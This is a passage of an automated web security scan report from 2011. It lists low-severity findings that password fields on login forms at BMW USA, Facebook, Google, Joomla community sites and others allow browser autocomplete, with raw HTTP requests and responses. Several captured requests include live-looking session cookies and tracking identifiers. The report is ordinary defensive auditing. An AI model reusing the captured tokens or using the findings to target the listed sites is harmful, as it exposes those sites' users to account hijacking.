Host:	https://www.bmwusa.com
Path:	/Secured/Content/Forms/Login.aspx

Issue detail

The page contains a form with the following action URL:

https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK

The form contains the following password fields with autocomplete enabled:

ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbPassword
ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbMFAnswer

Request

GET /Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=PC#1295637745501-300919.17#1296864738|check#true#1295655198|session#1295655081531-668160#1295656998; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Pragma: no-cache
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:16 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:16 GMT;path=/
Content-Length: 212255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
<body id="ctl00_ctl00_ctl00_BodyTag">
<form name="aspnetForm" method="post" action="/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm" onreset="if (window.setTimeout) window.setTimeout('VAM_OnReset(false);', 100);">
<div>
...[SNIP]...
<div class="signInInput">
                            <input name="ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbPassword" type="password" maxlength="32" id="ctl00_ctl00_ctl00_MasterContent_SideNavContent_tbPassword" class="regTextBox" style="width:200px;" />

                        </div>
...[SNIP]...
<td valign="middle">
                                               <input name="ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbMFAnswer" type="password" maxlength="50" id="ctl00_ctl00_ctl00_MasterContent_SideNavContent_tbMFAnswer" onkeypress="return(VAM_KeyPress(this, event))" onkeydown="return(VAM_OnKeyDown(this, event))" style="width:182px;" />
                                           </td>
...[SNIP]...

15.103. http://www.cloudaccess.net/client-login.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/client-login.html

Issue detail

The page contains a form with the following action URL:

https://billing.cloudaccess.net/jwhmcs.php?task=ulogin

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.104. http://www.dedipower.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.dedipower.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://portal.dedipower.com/

The form contains the following password field with autocomplete enabled:

pass

Request

GET / HTTP/1.1
Host: www.dedipower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: symfony=6hvnhit5lq2d9qcjo8guti4nu0; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</h6>
<form action="https://portal.dedipower.com" method="post">

<p>
...[SNIP]...
<br />
<input type="password" name="pass" /></p>
...[SNIP]...

15.105. http://www.dynamicdrive.com/forums/showthread.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.dynamicdrive.com
Path:	/forums/showthread.php

Issue detail

The page contains a form with the following action URL:

http://www.dynamicdrive.com/forums/login.php?do=login

The form contains the following password field with autocomplete enabled:

vb_login_password

Request

GET /forums/showthread.php HTTP/1.1
Host: www.dynamicdrive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.106. http://www.eraser.ee/uudised/joomla/329-joomla-16-on-saabunud.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eraser.ee
Path:	/uudised/joomla/329-joomla-16-on-saabunud.html

Issue detail

The page contains a form with the following action URL:

http://www.eraser.ee/uudised/joomla.html

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /uudised/joomla/329-joomla-16-on-saabunud.html HTTP/1.1
Host: www.eraser.ee
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.107. http://www.facebook.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.facebook.com/

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

Response

15.108. http://www.facebook.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.109. http://www.facebook.com/%s previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/%s

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=NgpY2; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:49 GMT
Content-Length: 11704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.110. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=wYDCq; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Mon, 24 Jan 2011 16:05:02 GMT
Content-Length: 11725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.111. http://www.facebook.com/7NEWS previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/7NEWS

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.112. http://www.facebook.com/LIMEprpromo previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/LIMEprpromo

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.113. http://www.facebook.com/abid.bahloul previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/abid.bahloul

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.114. http://www.facebook.com/apps/application.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/apps/application.php

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /apps/application.php?id=62945690879 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

15.115. http://www.facebook.com/beirutcityguide previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/beirutcityguide

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.116. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /connect/connect.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:12 GMT
Content-Length: 11418

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.117. http://www.facebook.com/miofeghali previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/miofeghali

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /miofeghali HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

15.118. http://www.facebook.com/paty.kfoury previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/paty.kfoury

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.119. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /plugins/likebox.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:14:46 GMT
Content-Length: 11419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.120. http://www.facebook.com/profile.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/profile.php

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.121. http://www.facebook.com/sharer.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sharer.php

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1&display=popup

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.122. https://www.google.com/accounts/Login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.google.com
Path:	/accounts/Login

Issue detail

The page contains a form with the following action URL:

https://www.google.com/accounts/ServiceLoginAuth

The form contains the following password field with autocomplete enabled:

Passwd

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=adTYhQttweA;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Mon, 24 Jan 2011 16:44:39 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10831
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
</style>
<form id="gaia_loginform"

action="https://www.google.com/accounts/ServiceLoginAuth" method="post"

onsubmit=
"return(gaia_onLoginSubmit());"
>
<div id="gaia_loginbox">
...[SNIP]...
<td>
<input type="password"
name="Passwd" id="Passwd"
size="18"

class="gaia le val"

/>
</td>
...[SNIP]...

15.123. https://www.google.com/accounts/ServiceLogin previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.google.com
Path:	/accounts/ServiceLogin

Issue detail

The page contains a form with the following action URL:

https://www.google.com/accounts/ServiceLoginAuth

The form contains the following password field with autocomplete enabled:

Passwd

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=UyGwfUaxON0;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Mon, 24 Jan 2011 16:45:03 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10829
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
</style>
<form id="gaia_loginform"

action="https://www.google.com/accounts/ServiceLoginAuth" method="post"

onsubmit=
"return(gaia_onLoginSubmit());"
>
<div id="gaia_loginbox">
...[SNIP]...
<td>
<input type="password"
name="Passwd" id="Passwd"
size="18"

class="gaia le val"

/>
</td>
...[SNIP]...

15.124. http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.heroturko.org
Path:	/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

Issue detail

The page contains a form with the following action URL:

http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

The form contains the following password field with autocomplete enabled:

login_password

Request

Response

15.125. http://www.homes.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.homes.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.homes.com/

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.homes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.126. http://www.id-joomla.com/berita-joomla/648-joomla-16-telah-datang previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.id-joomla.com
Path:	/berita-joomla/648-joomla-16-telah-datang

Issue detail

The page contains a form with the following action URL:

http://www.id-joomla.com/component/comprofiler/login

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /berita-joomla/648-joomla-16-telah-datang HTTP/1.1
Host: www.id-joomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.127. http://www.joomla.org/login.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.joomla.org
Path:	/login.html

Issue detail

The page contains a form with the following action URL:

http://www.joomla.org/login.html

The form contains the following password field with autocomplete enabled:

passwd

Request

Response

15.128. http://www.joomla.org.tw/news/joomla-official-news/163-joomla16-arrived previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.joomla.org.tw
Path:	/news/joomla-official-news/163-joomla16-arrived

Issue detail

The page contains a form with the following action URL:

http://www.joomla.org.tw/component/comprofiler/login

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /news/joomla-official-news/163-joomla16-arrived HTTP/1.1
Host: www.joomla.org.tw
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.129. http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.joomlacommunity.eu
Path:	/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

Issue detail

The page contains a form with the following action URL:

http://www.joomlacommunity.eu/index.php

The form contains the following password field with autocomplete enabled:

passwd

Request

Response

15.130. http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.joomlacorner.com
Path:	/joomla-news/608-joomla-16-has-arrived.html

Issue detail

The page contains a form with the following action URL:

http://www.joomlacorner.com/joomla-news/index.php

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /joomla-news/608-joomla-16-has-arrived.html HTTP/1.1
Host: www.joomlacorner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.131. http://www.joomlainorge.no/nyheter/joomla/552-joomlar-16-er-utgitt previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.joomlainorge.no
Path:	/nyheter/joomla/552-joomlar-16-er-utgitt

Issue detail

The page contains a form with the following action URL:

https://www.joomlainorge.no/nyheter/joomla

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /nyheter/joomla/552-joomlar-16-er-utgitt HTTP/1.1
Host: www.joomlainorge.no
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:22 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 536a515975b0bb224c84dbf364570dc5=d25c0652ad8dc304e171cefb60e2e9c9; path=/
Last-Modified: Mon, 24 Jan 2011 15:15:25 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nb-no" lang="nb-no" dir=
...[SNIP]...
<div class="module mod-blank first last">


           <form action="https://www.joomlainorge.no/nyheter/joomla" method="post" name="login">

<span class="quick" style="display: block;">
...[SNIP]...
<span class="password">

               <input type="password" name="passwd" size="10" alt="Passord" value="Passord" onblur="if(this.value=='') this.value='Passord';" onfocus="if(this.value=='Passord') this.value='';" />

           </span>
...[SNIP]...

15.132. http://www.linkagogo.com/go/AddNoPopup previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.linkagogo.com
Path:	/go/AddNoPopup

Issue detail

The page contains a form with the following action URL:

http://www.linkagogo.com/go/AddNoPopup

The form contains the following password field with autocomplete enabled:

password

Request

GET /go/AddNoPopup HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

15.133. http://www.lithuanianjoomla.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/index.php

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.134. http://www.lithuanianjoomla.com/7-joomla-naujienos/70-joomla-160-isleista.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/7-joomla-naujienos/70-joomla-160-isleista.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.135. http://www.lithuanianjoomla.com/apie-joomla.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/apie-joomla.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/apie-joomla.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.136. http://www.lithuanianjoomla.com/component/users/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/component/users/

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/component/users/

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:27 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
</h3>
<form action="/component/users/" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

15.137. http://www.lithuanianjoomla.com/component/users/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/component/users/

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/component/users/?task=user.login

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.138. http://www.lithuanianjoomla.com/index.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/index.php

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/index.php

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.139. http://www.lithuanianjoomla.com/joomla-naujienos.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.140. http://www.lithuanianjoomla.com/joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.141. http://www.lithuanianjoomla.com/joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.142. http://www.lithuanianjoomla.com/joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html

Issue detail

The page contains a form with the following action URL:

http://www.lithuanianjoomla.com/joomla-naujienos.html

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.143. http://www.lithuanianjoomla.com/joomla-naujienos/5-pirmasis-joomla-gimtadienis.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
